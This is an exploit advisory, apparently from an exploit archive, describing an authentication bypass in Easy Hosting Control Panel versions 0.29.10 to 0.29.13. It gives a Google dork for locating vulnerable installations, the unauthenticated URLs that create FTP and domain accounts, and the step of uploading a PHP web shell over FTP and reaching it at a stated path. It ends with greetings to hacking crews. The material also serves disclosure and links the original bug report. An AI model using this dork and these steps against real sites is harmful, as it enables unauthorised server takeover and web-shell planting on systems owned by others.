39 lines
No EOL
1.1 KiB
Text
39 lines
No EOL
1.1 KiB
Text
# Exploit Title: Easy Hosting Control Panel Admin Auth Bypass
|
|
# Google Dork: inurl:/ehcp/?op=applyfordomainaccount
|
|
# Date: 10/04/2011
|
|
# Author: Jasman
|
|
# Software Link: https://launchpad.net/ehcp & http://www.ehcp.net
|
|
# Version: 0.29.10 - 0.29.13
|
|
# Tested on: Ubuntu, Debian
|
|
|
|
|
|
+ Description
|
|
Easy Hosting Control Panel designed for hosting of multiple domains on single machine.
|
|
It uses LAMP(LinuxApacheMysqlPhp). Its aim:easily installable,easy usage, non-complex,functional
|
|
|
|
|
|
+ Vulnerable:
|
|
to add a ftp account & domain does not require a login.
|
|
|
|
http://site.com/vhosts/ehcp/?op=applyforaccount
|
|
http://site.com/vhosts/ehcp/?op=applyforftpaccount
|
|
http://site.com/vhosts/ehcp/?op=applyfordomainaccount
|
|
|
|
+ Exploit
|
|
upload a shell via ftp
|
|
http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php
|
|
|
|
+ Tested On
|
|
0.29.13
|
|
0.29.11
|
|
0.29.10
|
|
|
|
|
|
+ Other Link:
|
|
https://bugs.launchpad.net/ehcp/+bug/865889
|
|
|
|
|
|
+ Thank to:
|
|
ArRay,`yuda, N4ck0, K4pt3N, samu1241, bejamz, Gameover, antitos, yuki, pokeng,
|
|
aphe_aphe, jos_ali_joe, BlueBoyz, JFry_, Ihsana'Lab, Anaski Crew, Forum.ExploreCrew
|
|
Exploit-Id, FeeLcoMz All Indonesian Hacker |